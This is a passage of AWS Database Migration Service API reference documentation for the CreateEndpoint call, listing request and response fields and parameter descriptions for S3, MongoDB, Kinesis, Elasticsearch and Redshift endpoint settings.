'CdcInsertsOnly': True|False
},
DmsTransferSettings={
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
MongoDbSettings={
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
KinesisSettings={
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
ElasticsearchSettings={
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
RedshiftSettings={
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
)
**Response Syntax**
::
{
'Endpoint': {
'EndpointIdentifier': 'string',
'EndpointType': 'source'|'target',
'EngineName': 'string',
'EngineDisplayName': 'string',
'Username': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'ExtraConnectionAttributes': 'string',
'Status': 'string',
'KmsKeyId': 'string',
'EndpointArn': 'string',
'CertificateArn': 'string',
'SslMode': 'none'|'require'|'verify-ca'|'verify-full',
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'ExternalId': 'string',
'DynamoDbSettings': {
'ServiceAccessRoleArn': 'string'
},
'S3Settings': {
'ServiceAccessRoleArn': 'string',
'ExternalTableDefinition': 'string',
'CsvRowDelimiter': 'string',
'CsvDelimiter': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'CompressionType': 'none'|'gzip',
'EncryptionMode': 'sse-s3'|'sse-kms',
'ServerSideEncryptionKmsKeyId': 'string',
'DataFormat': 'csv'|'parquet',
'EncodingType': 'plain'|'plain-dictionary'|'rle-dictionary',
'DictPageSizeLimit': 123,
'RowGroupLength': 123,
'DataPageSize': 123,
'ParquetVersion': 'parquet-1-0'|'parquet-2-0',
'EnableStatistics': True|False,
'CdcInsertsOnly': True|False
},
'DmsTransferSettings': {
'ServiceAccessRoleArn': 'string',
'BucketName': 'string'
},
'MongoDbSettings': {
'Username': 'string',
'Password': 'string',
'ServerName': 'string',
'Port': 123,
'DatabaseName': 'string',
'AuthType': 'no'|'password',
'AuthMechanism': 'default'|'mongodb_cr'|'scram_sha_1',
'NestingLevel': 'none'|'one',
'ExtractDocId': 'string',
'DocsToInvestigate': 'string',
'AuthSource': 'string',
'KmsKeyId': 'string'
},
'KinesisSettings': {
'StreamArn': 'string',
'MessageFormat': 'json',
'ServiceAccessRoleArn': 'string'
},
'ElasticsearchSettings': {
'ServiceAccessRoleArn': 'string',
'EndpointUri': 'string',
'FullLoadErrorPercentage': 123,
'ErrorRetryDuration': 123
},
'RedshiftSettings': {
'AcceptAnyDate': True|False,
'AfterConnectScript': 'string',
'BucketFolder': 'string',
'BucketName': 'string',
'ConnectionTimeout': 123,
'DatabaseName': 'string',
'DateFormat': 'string',
'EmptyAsNull': True|False,
'EncryptionMode': 'sse-s3'|'sse-kms',
'FileTransferUploadStreams': 123,
'LoadTimeout': 123,
'MaxFileSize': 123,
'Password': 'string',
'Port': 123,
'RemoveQuotes': True|False,
'ReplaceInvalidChars': 'string',
'ReplaceChars': 'string',
'ServerName': 'string',
'ServiceAccessRoleArn': 'string',
'ServerSideEncryptionKmsKeyId': 'string',
'TimeFormat': 'string',
'TrimBlanks': True|False,
'TruncateColumns': True|False,
'Username': 'string',
'WriteBufferSize': 123
}
}
}
**Response Structure**
- *(dict) --*
- **Endpoint** *(dict) --*
The endpoint that was created.
- **EndpointIdentifier** *(string) --*
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
- **EndpointType** *(string) --*
The type of endpoint.
- **EngineName** *(string) --*
The database engine name. Valid values, depending on the EndPointType, include mysql, oracle, postgres, mariadb, aurora, aurora-postgresql, redshift, s3, db2, azuredb, sybase, sybase, dynamodb, mongodb, and sqlserver.
- **EngineDisplayName** *(string) --*
The expanded name for the engine name. For example, if the ``EngineName`` parameter is "aurora," this value would be "Amazon Aurora MySQL."
- **Username** *(string) --*
The user name used to connect to the endpoint.
- **ServerName** *(string) --*
The name of the server at the endpoint.
- **Port** *(integer) --*
The port value used to access the endpoint.
- **DatabaseName** *(string) --*
The name of the database at the endpoint.
- **ExtraConnectionAttributes** *(string) --*
Additional connection attributes used to connect to the endpoint.
- **Status** *(string) --*
The status of the endpoint.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **EndpointArn** *(string) --*
The Amazon Resource Name (ARN) string that uniquely identifies the endpoint.
- **CertificateArn** *(string) --*
The Amazon Resource Name (ARN) used for SSL connection to the endpoint.
- **SslMode** *(string) --*
The SSL mode used to connect to the endpoint.
SSL mode can be one of four values: none, require, verify-ca, verify-full.
The default value is none.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **ExternalId** *(string) --*
Value returned by a call to CreateEndpoint that can be used for cross-account validation. Use it on a subsequent call to CreateEndpoint to create the endpoint with a cross-account.
- **DynamoDbSettings** *(dict) --*
The settings for the target DynamoDB database. For more information, see the ``DynamoDBSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **S3Settings** *(dict) --*
The settings for the S3 target endpoint. For more information, see the ``S3Settings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a carriage return (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``"arn:aws:s3:::dms-*"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads. But as the number of row groups grows, the slower writes become. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
- **DmsTransferSettings** *(dict) --*
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. To use GZIP, set this value to ``NONE`` (the default). To keep the files uncompressed, don't use this value.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ "ServiceAccessRoleArn": "string", "BucketName": "string", "CompressionType": "none"|"gzip" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
- **MongoDbSettings** *(dict) --*
The settings for the MongoDB source endpoint. For more information, see the ``MongoDbSettings`` structure.
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when authType=No.
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don't specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
- **KinesisSettings** *(dict) --*
The settings for the Amazon Kinesis source endpoint. For more information, see the ``KinesisSettings`` structure.
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
- **ElasticsearchSettings** *(dict) --*
The settings for the Elasticsearch source endpoint. For more information, see the ``ElasticsearchSettings`` structure.
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by service to access the IAM role.
- **EndpointUri** *(string) --*
The endpoint for the ElasticSearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
- **RedshiftSettings** *(dict) --*
Settings for the Amazon Redshift endpoint
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of 'YYYY-MM-DD'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **EmptyAsNull** *(boolean) --*
Specifies whether AWS DMS should migrate empty CHAR and VARCHAR fields as NULL. A value of TRUE sets empty CHAR and VARCHAR fields to null. The default is FALSE.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either SSE_S3 (default) or SSE_KMS. To use SSE_S3, create an IAM role with a policy that allows ``"arn:aws:s3:::*"`` to use the following actions: ``"s3:PutObject", "s3:ListBucket"`` .
- **FileTransferUploadStreams** *(integer) --*
Specifies the number of threads used to upload a single file. This accepts a value between 1 and 64. It defaults to 10.
- **LoadTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you begin loading.
- **MaxFileSize** *(integer) --*
Specifies the maximum size (in KB) of any CSV file used to transfer data to Amazon Redshift. This accepts a value between 1 and 1048576. It defaults to 32768 KB (32 MB).
- **Password** *(string) --*
The password for the user named in the username property.
- **Port** *(integer) --*
The port number for Amazon Redshift. The default value is 5439.
- **RemoveQuotes** *(boolean) --*
Removes surrounding quotation marks from strings in the incoming data. All characters within the quotation marks, including delimiters, are retained. Choose TRUE to remove quotation marks. The default is FALSE.
- **ReplaceInvalidChars** *(string) --*
A list of chars you want to replace. Use with ``ReplaceChars`` .
- **ReplaceChars** *(string) --*
Replaces invalid characters specified in ``ReplaceInvalidChars`` , substituting the specified value instead. The default is "?".
- **ServerName** *(string) --*
The name of the Amazon Redshift cluster you are using.
- **ServiceAccessRoleArn** *(string) --*
The ARN of the role that has access to the Redshift service.
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
- **TimeFormat** *(string) --*
The time format you want to use. Valid values are ``auto`` (case-sensitive), 'timeformat_string', 'epochsecs', or 'epochmillisecs'. It defaults to 10. Using ``auto`` recognizes most strings, even some that are not supported when you use a time format string.
If your date and time values use formats different from each other, set this to ``auto`` .
- **TrimBlanks** *(boolean) --*
Removes the trailing white space characters from a VARCHAR string. This parameter applies only to columns with a VARCHAR data type. Choose TRUE to remove unneeded white space. The default is FALSE.
- **TruncateColumns** *(boolean) --*
Truncates data in columns to the appropriate number of characters, so that it fits in the column. Applies only to columns with a VARCHAR or CHAR data type, and rows with a size of 4 MB or less. Choose TRUE to truncate data. The default is FALSE.
- **Username** *(string) --*
An Amazon Redshift user name for a registered user.
- **WriteBufferSize** *(integer) --*
The size of the write buffer to use in rows. Valid values range from 1 to 2048. Defaults to 1024. Use this setting to tune performance.
:type EndpointIdentifier: string
:param EndpointIdentifier: **[REQUIRED]**
The database endpoint identifier. Identifiers must begin with a letter; must contain only ASCII letters, digits, and hyphens; and must not end with a hyphen or contain two consecutive hyphens.
:type EndpointType: string
:param EndpointType: **[REQUIRED]**
The type of endpoint.
:type EngineName: string
:param EngineName: **[REQUIRED]**
The type of engine for the endpoint. Valid values, depending on the ``EndPointType`` value, include ``mysql`` , ``oracle`` , ``postgres`` , ``mariadb`` , ``aurora`` , ``aurora-postgresql`` , ``redshift`` , ``s3`` , ``db2`` , ``azuredb`` , ``sybase`` , ``dynamodb`` , ``mongodb`` , and ``sqlserver`` .
:type Username: string
:param Username:
The user name to be used to log in to the endpoint database.
:type Password: string
:param Password:
The password to be used to log in to the endpoint database.
:type ServerName: string
:param ServerName:
The name of the server where the endpoint database resides.
:type Port: integer
:param Port:
The port used by the endpoint database.
:type DatabaseName: string
:param DatabaseName:
The name of the endpoint database.
:type ExtraConnectionAttributes: string
:param ExtraConnectionAttributes:
Additional attributes associated with the connection.
:type KmsKeyId: string
:param KmsKeyId:
The AWS KMS key identifier to use to encrypt the connection parameters. If you don\'t specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
:type Tags: list
:param Tags:
Tags to be added to the endpoint.
- *(dict) --*
- **Key** *(string) --*
A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
- **Value** *(string) --*
A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with \"aws:\" or \"dms:\". The string can only contain only the set of Unicode letters, digits, white-space, \'_\', \'.\', \'/\', \'=\', \'+\', \'-\' (Java regex: \"^([\\p{L}\\p{Z}\\p{N}_.:/=+\\-]*)$\").
:type CertificateArn: string
:param CertificateArn:
The Amazon Resource Name (ARN) for the certificate.
:type SslMode: string
:param SslMode:
The Secure Sockets Layer (SSL) mode to use for the SSL connection. The SSL mode can be one of four values: ``none`` , ``require`` , ``verify-ca`` , ``verify-full`` . The default value is ``none`` .
:type ServiceAccessRoleArn: string
:param ServiceAccessRoleArn:
The Amazon Resource Name (ARN) for the service access role that you want to use to create the endpoint.
:type ExternalTableDefinition: string
:param ExternalTableDefinition:
The external table definition.
:type DynamoDbSettings: dict
:param DynamoDbSettings:
Settings in JSON format for the target Amazon DynamoDB endpoint. For more information about the available settings, see `Using Object Mapping to Migrate Data to DynamoDB <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.DynamoDB.html>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) used by the service access IAM role.
:type S3Settings: dict
:param S3Settings:
Settings in JSON format for the target Amazon S3 endpoint. For more information about the available settings, see `Extra Connection Attributes When Using Amazon S3 as a Target for AWS DMS <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.S3.html#CHAP_Target.S3.Configuring>`__ in the *AWS Database Migration Service User Guide.*
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) used by the service access IAM role.
- **ExternalTableDefinition** *(string) --*
The external table definition.
- **CsvRowDelimiter** *(string) --*
The delimiter used to separate rows in the source files. The default is a carriage return (``\n`` ).
- **CsvDelimiter** *(string) --*
The delimiter used to separate columns in the source files. The default is a comma.
- **BucketFolder** *(string) --*
An optional parameter to set a folder name in the S3 bucket. If provided, tables are created in the path ``<bucketFolder>/<schema_name>/<table_name>/`` . If this parameter is not specified, then the path used is ``<schema_name>/<table_name>/`` .
- **BucketName** *(string) --*
The name of the S3 bucket.
- **CompressionType** *(string) --*
An optional parameter to use GZIP to compress the target files. Set to GZIP to compress the target files. Set to NONE (the default) or do not use to leave the files uncompressed. Applies to both CSV and PARQUET data formats.
- **EncryptionMode** *(string) --*
The type of server side encryption you want to use for your data. This is part of the endpoint settings or the extra connections attributes for Amazon S3. You can choose either ``SSE_S3`` (default) or ``SSE_KMS`` . To use ``SSE_S3`` , you need an IAM role with permission to allow ``\"arn:aws:s3:::dms-*\"`` to use the following actions:
* s3:CreateBucket
* s3:ListBucket
* s3:DeleteBucket
* s3:GetBucketLocation
* s3:GetObject
* s3:PutObject
* s3:DeleteObject
* s3:GetObjectVersion
* s3:GetBucketPolicy
* s3:PutBucketPolicy
* s3:DeleteBucketPolicy
- **ServerSideEncryptionKmsKeyId** *(string) --*
If you are using SSE_KMS for the ``EncryptionMode`` , provide the KMS Key ID. The key you use needs an attached policy that enables IAM user permissions and allows use of the key.
Here is a CLI example: ``aws dms create-endpoint --endpoint-identifier <value> --endpoint-type target --engine-name s3 --s3-settings ServiceAccessRoleArn=<value>,BucketFolder=<value>,BucketName=<value>,EncryptionMode=SSE_KMS,ServerSideEncryptionKmsKeyId=<value>``
- **DataFormat** *(string) --*
The format of the data which you want to use for output. You can choose one of the following:
* ``CSV`` : This is a row-based format with comma-separated values.
* ``PARQUET`` : Apache Parquet is a columnar storage format that features efficient compression and provides faster query response.
- **EncodingType** *(string) --*
The type of encoding you are using: ``RLE_DICTIONARY`` (default), ``PLAIN`` , or ``PLAIN_DICTIONARY`` .
* ``RLE_DICTIONARY`` uses a combination of bit-packing and run-length encoding to store repeated values more efficiently.
* ``PLAIN`` does not use encoding at all. Values are stored as they are.
* ``PLAIN_DICTIONARY`` builds a dictionary of the values encountered in a given column. The dictionary is stored in a dictionary page for each column chunk.
- **DictPageSizeLimit** *(integer) --*
The maximum size of an encoded dictionary page of a column. If the dictionary page exceeds this, this column is stored using an encoding type of ``PLAIN`` . Defaults to 1024 * 1024 bytes (1MiB), the maximum size of a dictionary page before it reverts to ``PLAIN`` encoding. For ``PARQUET`` format only.
- **RowGroupLength** *(integer) --*
The number of rows in a row group. A smaller row group size provides faster reads. But as the number of row groups grows, the slower writes become. Defaults to 10,000 (ten thousand) rows. For ``PARQUET`` format only.
If you choose a value larger than the maximum, ``RowGroupLength`` is set to the max row group length in bytes (64 * 1024 * 1024).
- **DataPageSize** *(integer) --*
The size of one data page in bytes. Defaults to 1024 * 1024 bytes (1MiB). For ``PARQUET`` format only.
- **ParquetVersion** *(string) --*
The version of Apache Parquet format you want to use: ``PARQUET_1_0`` (default) or ``PARQUET_2_0`` .
- **EnableStatistics** *(boolean) --*
Enables statistics for Parquet pages and rowGroups. Choose ``TRUE`` to enable statistics, choose ``FALSE`` to disable. Statistics include ``NULL`` , ``DISTINCT`` , ``MAX`` , and ``MIN`` values. Defaults to ``TRUE`` . For ``PARQUET`` format only.
- **CdcInsertsOnly** *(boolean) --*
Option to write only ``INSERT`` operations to the comma-separated value (CSV) output files. By default, the first field in a CSV record contains the letter ``I`` (insert), ``U`` (update) or ``D`` (delete) to indicate whether the row was inserted, updated, or deleted at the source database. If ``cdcInsertsOnly`` is set to true, then only ``INSERT`` s are recorded in the CSV file, without the ``I`` annotation on each line. Valid values are ``TRUE`` and ``FALSE`` .
:type DmsTransferSettings: dict
:param DmsTransferSettings:
The settings in JSON format for the DMS transfer type of source endpoint.
Possible attributes include the following:
* ``serviceAccessRoleArn`` - The IAM role that has permission to access the Amazon S3 bucket.
* ``bucketName`` - The name of the S3 bucket to use.
* ``compressionType`` - An optional parameter to use GZIP to compress the target files. To use GZIP, set this value to ``NONE`` (the default). To keep the files uncompressed, don\'t use this value.
Shorthand syntax for these attributes is as follows: ``ServiceAccessRoleArn=string,BucketName=string,CompressionType=string``
JSON syntax for these attributes is as follows: ``{ \"ServiceAccessRoleArn\": \"string\", \"BucketName\": \"string\", \"CompressionType\": \"none\"|\"gzip\" }``
- **ServiceAccessRoleArn** *(string) --*
The IAM role that has permission to access the Amazon S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket to use.
:type MongoDbSettings: dict
:param MongoDbSettings:
Settings in JSON format for the source MongoDB endpoint. For more information about the available settings, see the configuration properties section in `Using MongoDB as a Target for AWS Database Migration Service <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Source.MongoDB.html>`__ in the *AWS Database Migration Service User Guide.*
- **Username** *(string) --*
The user name you use to access the MongoDB source endpoint.
- **Password** *(string) --*
The password for the user account you use to access the MongoDB source endpoint.
- **ServerName** *(string) --*
The name of the server on the MongoDB source endpoint.
- **Port** *(integer) --*
The port value for the MongoDB source endpoint.
- **DatabaseName** *(string) --*
The database name on the MongoDB source endpoint.
- **AuthType** *(string) --*
The authentication type you use to access the MongoDB source endpoint.
Valid values: NO, PASSWORD
When NO is selected, user name and password parameters are not used and can be empty.
- **AuthMechanism** *(string) --*
The authentication mechanism you use to access the MongoDB source endpoint.
Valid values: DEFAULT, MONGODB_CR, SCRAM_SHA_1
DEFAULT – For MongoDB version 2.x, use MONGODB_CR. For MongoDB version 3.x, use SCRAM_SHA_1. This attribute is not used when authType=No.
- **NestingLevel** *(string) --*
Specifies either document or table mode.
Valid values: NONE, ONE
Default value is NONE. Specify NONE to use document mode. Specify ONE to use table mode.
- **ExtractDocId** *(string) --*
Specifies the document ID. Use this attribute when ``NestingLevel`` is set to NONE.
Default value is false.
- **DocsToInvestigate** *(string) --*
Indicates the number of documents to preview to determine the document organization. Use this attribute when ``NestingLevel`` is set to ONE.
Must be a positive value greater than 0. Default value is 1000.
- **AuthSource** *(string) --*
The MongoDB database name. This attribute is not used when ``authType=NO`` .
The default is admin.
- **KmsKeyId** *(string) --*
The AWS KMS key identifier that is used to encrypt the content on the replication instance. If you don\'t specify a value for the ``KmsKeyId`` parameter, then AWS DMS uses your default encryption key. AWS KMS creates the default encryption key for your AWS account. Your AWS account has a different default encryption key for each AWS Region.
:type KinesisSettings: dict
:param KinesisSettings:
Settings in JSON format for the target Amazon Kinesis Data Streams endpoint. For more information about the available settings, see `Using Object Mapping to Migrate Data to a Kinesis Data Stream <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.Kinesis.html#CHAP_Target.Kinesis.ObjectMapping >`__ in the *AWS Database Migration User Guide.*
- **StreamArn** *(string) --*
The Amazon Resource Name (ARN) for the Amazon Kinesis Data Streams endpoint.
- **MessageFormat** *(string) --*
The output format for the records created on the endpoint. The message format is ``JSON`` .
- **ServiceAccessRoleArn** *(string) --*
The Amazon Resource Name (ARN) for the IAM role that DMS uses to write to the Amazon Kinesis data stream.
:type ElasticsearchSettings: dict
:param ElasticsearchSettings:
Settings in JSON format for the target Elasticsearch endpoint. For more information about the available settings, see `Extra Connection Attributes When Using Elasticsearch as a Target for AWS DMS <https://docs.aws.amazon.com/dms/latest/userguide/CHAP_Target.Elasticsearch.html#CHAP_Target.Elasticsearch.Configuration>`__ in the *AWS Database Migration User Guide.*
- **ServiceAccessRoleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) used by service to access the IAM role.
- **EndpointUri** *(string) --* **[REQUIRED]**
The endpoint for the ElasticSearch cluster.
- **FullLoadErrorPercentage** *(integer) --*
The maximum percentage of records that can fail to be written before a full load operation stops.
- **ErrorRetryDuration** *(integer) --*
The maximum number of seconds that DMS retries failed API requests to the Elasticsearch cluster.
:type RedshiftSettings: dict
:param RedshiftSettings:
- **AcceptAnyDate** *(boolean) --*
Allows any date format, including invalid formats such as 00/00/00 00:00:00, to be loaded without generating an error. You can choose TRUE or FALSE (default).
This parameter applies only to TIMESTAMP and DATE columns. Always use ACCEPTANYDATE with the DATEFORMAT parameter. If the date format for the data does not match the DATEFORMAT specification, Amazon Redshift inserts a NULL value into that field.
- **AfterConnectScript** *(string) --*
Code to run after connecting. This should be the code, not a filename.
- **BucketFolder** *(string) --*
The location where the CSV files are stored before being uploaded to the S3 bucket.
- **BucketName** *(string) --*
The name of the S3 bucket you want to use
- **ConnectionTimeout** *(integer) --*
Sets the amount of time to wait (in milliseconds) before timing out, beginning from when you initially establish a connection.
- **DatabaseName** *(string) --*
The name of the Amazon Redshift data warehouse (service) you are working with.
- **DateFormat** *(string) --*
The date format you are using. Valid values are ``auto`` (case-sensitive), your date format string enclosed in quotes, or NULL. If this is left unset (NULL), it defaults to a format of \'YYYY-MM-DD\'. Using ``auto`` recognizes most strings, even some that are not supported when you use a date format string.
